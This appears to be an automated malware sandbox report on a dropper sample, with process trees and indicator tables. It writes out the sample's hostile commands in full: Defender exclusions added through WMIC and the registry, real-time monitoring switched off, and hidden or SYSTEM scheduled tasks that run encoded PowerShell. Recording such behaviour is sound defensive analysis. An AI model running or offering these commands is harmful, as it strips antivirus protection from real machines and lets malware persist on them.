2620	EygrVAx.exe
2620	EygrVAx.exe
2620	EygrVAx.exe
2276	powershell.exe
2620	EygrVAx.exe
2620	EygrVAx.exe
2620	EygrVAx.exe
2620	EygrVAx.exe
2620	EygrVAx.exe
2620	EygrVAx.exe
2620	EygrVAx.exe
2620	EygrVAx.exe
2620	EygrVAx.exe

Suspicious use of AdjustPrivilegeToken 63 IoCs

Processes:

powershell.exeWMIC.exepowershell.EXEpowershell.EXEpowershell.exeWMIC.exepowershell.EXEpowershell.exeWMIC.exepowershell.exeWMIC.exe

description	pid	process
Token: SeDebugPrivilege	2764	powershell.exe
Token: SeIncreaseQuotaPrivilege	2676	WMIC.exe
Token: SeSecurityPrivilege	2676	WMIC.exe
Token: SeTakeOwnershipPrivilege	2676	WMIC.exe
Token: SeLoadDriverPrivilege	2676	WMIC.exe
Token: SeSystemProfilePrivilege	2676	WMIC.exe
Token: SeSystemtimePrivilege	2676	WMIC.exe
Token: SeProfSingleProcessPrivilege	2676	WMIC.exe
Token: SeIncBasePriorityPrivilege	2676	WMIC.exe
Token: SeCreatePagefilePrivilege	2676	WMIC.exe
Token: SeBackupPrivilege	2676	WMIC.exe
Token: SeRestorePrivilege	2676	WMIC.exe
Token: SeShutdownPrivilege	2676	WMIC.exe
Token: SeDebugPrivilege	2676	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2676	WMIC.exe
Token: SeRemoteShutdownPrivilege	2676	WMIC.exe
Token: SeUndockPrivilege	2676	WMIC.exe
Token: SeManageVolumePrivilege	2676	WMIC.exe
Token: 33	2676	WMIC.exe
Token: 34	2676	WMIC.exe
Token: 35	2676	WMIC.exe
Token: SeDebugPrivilege	2980	powershell.EXE
Token: SeDebugPrivilege	2416	powershell.EXE
Token: SeDebugPrivilege	1256	powershell.exe
Token: SeAssignPrimaryTokenPrivilege	1692	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1692	WMIC.exe
Token: SeSecurityPrivilege	1692	WMIC.exe
Token: SeTakeOwnershipPrivilege	1692	WMIC.exe
Token: SeLoadDriverPrivilege	1692	WMIC.exe
Token: SeSystemtimePrivilege	1692	WMIC.exe
Token: SeBackupPrivilege	1692	WMIC.exe
Token: SeRestorePrivilege	1692	WMIC.exe
Token: SeShutdownPrivilege	1692	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1692	WMIC.exe
Token: SeUndockPrivilege	1692	WMIC.exe
Token: SeManageVolumePrivilege	1692	WMIC.exe
Token: SeDebugPrivilege	1704	powershell.EXE
Token: SeDebugPrivilege	2220	powershell.exe
Token: SeAssignPrimaryTokenPrivilege	1292	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1292	WMIC.exe
Token: SeSecurityPrivilege	1292	WMIC.exe
Token: SeTakeOwnershipPrivilege	1292	WMIC.exe
Token: SeLoadDriverPrivilege	1292	WMIC.exe
Token: SeSystemtimePrivilege	1292	WMIC.exe
Token: SeBackupPrivilege	1292	WMIC.exe
Token: SeRestorePrivilege	1292	WMIC.exe
Token: SeShutdownPrivilege	1292	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1292	WMIC.exe
Token: SeUndockPrivilege	1292	WMIC.exe
Token: SeManageVolumePrivilege	1292	WMIC.exe
Token: SeDebugPrivilege	2276	powershell.exe
Token: SeAssignPrimaryTokenPrivilege	1912	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1912	WMIC.exe
Token: SeSecurityPrivilege	1912	WMIC.exe
Token: SeTakeOwnershipPrivilege	1912	WMIC.exe
Token: SeLoadDriverPrivilege	1912	WMIC.exe
Token: SeSystemtimePrivilege	1912	WMIC.exe
Token: SeBackupPrivilege	1912	WMIC.exe
Token: SeRestorePrivilege	1912	WMIC.exe
Token: SeShutdownPrivilege	1912	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1912	WMIC.exe
Token: SeUndockPrivilege	1912	WMIC.exe
Token: SeManageVolumePrivilege	1912	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

95d60a080cfb12b483bebc85755d2b083fe4c958780b2d647dee92008e3b88d8.exeInstall.exeInstall.exeforfiles.execmd.exepowershell.exetaskeng.exezbqjHGl.exetaskeng.exe

description	pid	process	target process
PID 2916 wrote to memory of 2992	2916	95d60a080cfb12b483bebc85755d2b083fe4c958780b2d647dee92008e3b88d8.exe	Install.exe
PID 2916 wrote to memory of 2992	2916	95d60a080cfb12b483bebc85755d2b083fe4c958780b2d647dee92008e3b88d8.exe	Install.exe
PID 2916 wrote to memory of 2992	2916	95d60a080cfb12b483bebc85755d2b083fe4c958780b2d647dee92008e3b88d8.exe	Install.exe
PID 2916 wrote to memory of 2992	2916	95d60a080cfb12b483bebc85755d2b083fe4c958780b2d647dee92008e3b88d8.exe	Install.exe
PID 2916 wrote to memory of 2992	2916	95d60a080cfb12b483bebc85755d2b083fe4c958780b2d647dee92008e3b88d8.exe	Install.exe
PID 2916 wrote to memory of 2992	2916	95d60a080cfb12b483bebc85755d2b083fe4c958780b2d647dee92008e3b88d8.exe	Install.exe
PID 2916 wrote to memory of 2992	2916	95d60a080cfb12b483bebc85755d2b083fe4c958780b2d647dee92008e3b88d8.exe	Install.exe
PID 2992 wrote to memory of 3000	2992	Install.exe	Install.exe
PID 2992 wrote to memory of 3000	2992	Install.exe	Install.exe
PID 2992 wrote to memory of 3000	2992	Install.exe	Install.exe
PID 2992 wrote to memory of 3000	2992	Install.exe	Install.exe
PID 2992 wrote to memory of 3000	2992	Install.exe	Install.exe
PID 2992 wrote to memory of 3000	2992	Install.exe	Install.exe
PID 2992 wrote to memory of 3000	2992	Install.exe	Install.exe
PID 3000 wrote to memory of 2464	3000	Install.exe	forfiles.exe
PID 3000 wrote to memory of 2464	3000	Install.exe	forfiles.exe
PID 3000 wrote to memory of 2464	3000	Install.exe	forfiles.exe
PID 3000 wrote to memory of 2464	3000	Install.exe	forfiles.exe
PID 3000 wrote to memory of 2464	3000	Install.exe	forfiles.exe
PID 3000 wrote to memory of 2464	3000	Install.exe	forfiles.exe
PID 3000 wrote to memory of 2464	3000	Install.exe	forfiles.exe
PID 2464 wrote to memory of 2788	2464	forfiles.exe	cmd.exe
PID 2464 wrote to memory of 2788	2464	forfiles.exe	cmd.exe
PID 2464 wrote to memory of 2788	2464	forfiles.exe	cmd.exe
PID 2464 wrote to memory of 2788	2464	forfiles.exe	cmd.exe
PID 2464 wrote to memory of 2788	2464	forfiles.exe	cmd.exe
PID 2464 wrote to memory of 2788	2464	forfiles.exe	cmd.exe
PID 2464 wrote to memory of 2788	2464	forfiles.exe	cmd.exe
PID 2788 wrote to memory of 2764	2788	cmd.exe	powershell.exe
PID 2788 wrote to memory of 2764	2788	cmd.exe	powershell.exe
PID 2788 wrote to memory of 2764	2788	cmd.exe	powershell.exe
PID 2788 wrote to memory of 2764	2788	cmd.exe	powershell.exe
PID 2788 wrote to memory of 2764	2788	cmd.exe	powershell.exe
PID 2788 wrote to memory of 2764	2788	cmd.exe	powershell.exe
PID 2788 wrote to memory of 2764	2788	cmd.exe	powershell.exe
PID 2764 wrote to memory of 2676	2764	powershell.exe	WMIC.exe
PID 2764 wrote to memory of 2676	2764	powershell.exe	WMIC.exe
PID 2764 wrote to memory of 2676	2764	powershell.exe	WMIC.exe
PID 2764 wrote to memory of 2676	2764	powershell.exe	WMIC.exe
PID 2764 wrote to memory of 2676	2764	powershell.exe	WMIC.exe
PID 2764 wrote to memory of 2676	2764	powershell.exe	WMIC.exe
PID 2764 wrote to memory of 2676	2764	powershell.exe	WMIC.exe
PID 3000 wrote to memory of 2412	3000	Install.exe	schtasks.exe
PID 3000 wrote to memory of 2412	3000	Install.exe	schtasks.exe
PID 3000 wrote to memory of 2412	3000	Install.exe	schtasks.exe
PID 3000 wrote to memory of 2412	3000	Install.exe	schtasks.exe
PID 3000 wrote to memory of 2412	3000	Install.exe	schtasks.exe
PID 3000 wrote to memory of 2412	3000	Install.exe	schtasks.exe
PID 3000 wrote to memory of 2412	3000	Install.exe	schtasks.exe
PID 1932 wrote to memory of 2236	1932	taskeng.exe	zbqjHGl.exe
PID 1932 wrote to memory of 2236	1932	taskeng.exe	zbqjHGl.exe
PID 1932 wrote to memory of 2236	1932	taskeng.exe	zbqjHGl.exe
PID 1932 wrote to memory of 2236	1932	taskeng.exe	zbqjHGl.exe
PID 2236 wrote to memory of 372	2236	zbqjHGl.exe	schtasks.exe
PID 2236 wrote to memory of 372	2236	zbqjHGl.exe	schtasks.exe
PID 2236 wrote to memory of 372	2236	zbqjHGl.exe	schtasks.exe
PID 2236 wrote to memory of 372	2236	zbqjHGl.exe	schtasks.exe
PID 2236 wrote to memory of 316	2236	zbqjHGl.exe	schtasks.exe
PID 2236 wrote to memory of 316	2236	zbqjHGl.exe	schtasks.exe
PID 2236 wrote to memory of 316	2236	zbqjHGl.exe	schtasks.exe
PID 2236 wrote to memory of 316	2236	zbqjHGl.exe	schtasks.exe
PID 484 wrote to memory of 2980	484	taskeng.exe	powershell.EXE
PID 484 wrote to memory of 2980	484	taskeng.exe	powershell.EXE
PID 484 wrote to memory of 2980	484	taskeng.exe	powershell.EXE

C:\Users\Admin\AppData\Local\Temp\95d60a080cfb12b483bebc85755d2b083fe4c958780b2d647dee92008e3b88d8.exe
"C:\Users\Admin\AppData\Local\Temp\95d60a080cfb12b483bebc85755d2b083fe4c958780b2d647dee92008e3b88d8.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2916

C:\Users\Admin\AppData\Local\Temp\7zS2349.tmp\Install.exe
.\Install.exe
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2992

C:\Users\Admin\AppData\Local\Temp\7zS255C.tmp\Install.exe
.\Install.exe /qvLBwdidF "525403" /S
3⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Loads dropped DLL
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:3000

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
4⤵
- Suspicious use of WriteProcessMemory
PID:2464

C:\Windows\SysWOW64\cmd.exe
/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
5⤵
- Suspicious use of WriteProcessMemory
PID:2788

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
6⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2764

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
7⤵
- Suspicious use of AdjustPrivilegeToken
PID:2676

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "brlogsXZdQLKJRjYtj" /SC once /ST 05:07:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\KgqmxDjAgxgUqXtom\WAZLfnWFkOIyIxR\zbqjHGl.exe\" OF /PydidtO 525403 /S" /V1 /F
4⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
PID:2412

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3000 -s 512
4⤵
- Loads dropped DLL
- Program crash
PID:2244

C:\Windows\system32\taskeng.exe
taskeng.exe {2A434DD7-8AB7-46BE-BEDF-BDC12B47BF7E} S-1-5-18:NT AUTHORITY\System:Service:
1⤵
- Suspicious use of WriteProcessMemory
PID:1932

C:\Users\Admin\AppData\Local\Temp\KgqmxDjAgxgUqXtom\WAZLfnWFkOIyIxR\zbqjHGl.exe
C:\Users\Admin\AppData\Local\Temp\KgqmxDjAgxgUqXtom\WAZLfnWFkOIyIxR\zbqjHGl.exe OF /PydidtO 525403 /S
2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of WriteProcessMemory
PID:2236

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gHHnPguCz" /SC once /ST 01:27:07 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
3⤵
- Scheduled Task/Job: Scheduled Task
PID:372

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gHHnPguCz"
3⤵
PID:316

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gHHnPguCz"
3⤵
PID:3052

C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
3⤵
PID:2472

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
4⤵
- Modifies Windows Defender Real-time Protection settings
PID:2864

C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
3⤵
PID:1480

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
4⤵
- Modifies Windows Defender Real-time Protection settings
PID:1304

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "geDiJPkiE" /SC once /ST 03:49:27 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
3⤵
- Scheduled Task/Job: Scheduled Task
PID:1376

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "geDiJPkiE"
3⤵
PID:868

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "geDiJPkiE"
3⤵
PID:992

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True"
3⤵
PID:1752

C:\Windows\SysWOW64\cmd.exe
/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
4⤵
PID:2156

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
5⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1256

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
6⤵
- Suspicious use of AdjustPrivilegeToken
PID:1692

C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\PfAmACXkWBLbKqPZ" /t REG_DWORD /d 0 /reg:32
3⤵
PID:2108

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\PfAmACXkWBLbKqPZ" /t REG_DWORD /d 0 /reg:32
4⤵
- Windows security bypass
PID:1716

C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\PfAmACXkWBLbKqPZ" /t REG_DWORD /d 0 /reg:64
3⤵
PID:2012

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\PfAmACXkWBLbKqPZ" /t REG_DWORD /d 0 /reg:64
4⤵
- Windows security bypass
PID:1092

C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\PfAmACXkWBLbKqPZ" /t REG_DWORD /d 0 /reg:32
3⤵
PID:2536

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\PfAmACXkWBLbKqPZ" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1700

C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\PfAmACXkWBLbKqPZ" /t REG_DWORD /d 0 /reg:64
3⤵
PID:1744

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\PfAmACXkWBLbKqPZ" /t REG_DWORD /d 0 /reg:64
4⤵
PID:2696

C:\Windows\SysWOW64\cmd.exe
cmd /C copy nul "C:\Windows\Temp\PfAmACXkWBLbKqPZ\yFWpTikz\qMhllvihaINQEiUB.wsf"
3⤵
PID:3032

C:\Windows\SysWOW64\wscript.exe
wscript "C:\Windows\Temp\PfAmACXkWBLbKqPZ\yFWpTikz\qMhllvihaINQEiUB.wsf"
3⤵
- Modifies data under HKEY_USERS
PID:2676

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\TuhNvssQnTUn" /t REG_DWORD /d 0 /reg:32
4⤵
- Windows security bypass
PID:2168

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\TuhNvssQnTUn" /t REG_DWORD /d 0 /reg:64
4⤵
- Windows security bypass
PID:2532

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZDLVjxnHU" /t REG_DWORD /d 0 /reg:32
4⤵
- Windows security bypass
PID:3028

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZDLVjxnHU" /t REG_DWORD /d 0 /reg:64
4⤵
- Windows security bypass
PID:2564

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ijGSqddcuZeU2" /t REG_DWORD /d 0 /reg:32
4⤵
- Windows security bypass
PID:2632

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ijGSqddcuZeU2" /t REG_DWORD /d 0 /reg:64
4⤵
- Windows security bypass
PID:2528

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nIXneLoYhSqxVZkgocR" /t REG_DWORD /d 0 /reg:32
4⤵
- Windows security bypass
PID:1604

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nIXneLoYhSqxVZkgocR" /t REG_DWORD /d 0 /reg:64
4⤵
- Windows security bypass
PID:2164

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wWtwQxeSPhIsC" /t REG_DWORD /d 0 /reg:32
4⤵
- Windows security bypass
PID:2688

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wWtwQxeSPhIsC" /t REG_DWORD /d 0 /reg:64
4⤵
- Windows security bypass
PID:2836

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\rPjTFWmQUriHtIVB" /t REG_DWORD /d 0 /reg:32
4⤵
- Windows security bypass
PID:1952

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\rPjTFWmQUriHtIVB" /t REG_DWORD /d 0 /reg:64
4⤵
- Windows security bypass
PID:1664

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
4⤵
- Windows security bypass
PID:372

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
4⤵
- Windows security bypass
PID:1520

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\KgqmxDjAgxgUqXtom" /t REG_DWORD /d 0 /reg:32
4⤵
- Windows security bypass
PID:1344

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\KgqmxDjAgxgUqXtom" /t REG_DWORD /d 0 /reg:64
4⤵
- Windows security bypass
PID:2308

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\PfAmACXkWBLbKqPZ" /t REG_DWORD /d 0 /reg:32
4⤵
- Windows security bypass
PID:1196

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\PfAmACXkWBLbKqPZ" /t REG_DWORD /d 0 /reg:64
4⤵
- Windows security bypass
PID:2084

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\TuhNvssQnTUn" /t REG_DWORD /d 0 /reg:32
4⤵
PID:2196

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\TuhNvssQnTUn" /t REG_DWORD /d 0 /reg:64
4⤵
PID:2892

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZDLVjxnHU" /t REG_DWORD /d 0 /reg:32
4⤵
PID:2300

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZDLVjxnHU" /t REG_DWORD /d 0 /reg:64
4⤵
PID:2036

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ijGSqddcuZeU2" /t REG_DWORD /d 0 /reg:32
4⤵
PID:2024

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ijGSqddcuZeU2" /t REG_DWORD /d 0 /reg:64
4⤵
PID:828

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nIXneLoYhSqxVZkgocR" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1816

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nIXneLoYhSqxVZkgocR" /t REG_DWORD /d 0 /reg:64
4⤵
PID:1380

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wWtwQxeSPhIsC" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1304

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\wWtwQxeSPhIsC" /t REG_DWORD /d 0 /reg:64
4⤵
PID:2388

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\rPjTFWmQUriHtIVB" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1776

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\rPjTFWmQUriHtIVB" /t REG_DWORD /d 0 /reg:64
4⤵
PID:1864

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1600

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
4⤵
PID:952

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\KgqmxDjAgxgUqXtom" /t REG_DWORD /d 0 /reg:32
4⤵
PID:2416

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\KgqmxDjAgxgUqXtom" /t REG_DWORD /d 0 /reg:64
4⤵
PID:2100

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\PfAmACXkWBLbKqPZ" /t REG_DWORD /d 0 /reg:32
4⤵
PID:2644

C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\PfAmACXkWBLbKqPZ" /t REG_DWORD /d 0 /reg:64
4⤵
PID:2516

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gMqxTUtwr" /SC once /ST 01:23:47 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
3⤵
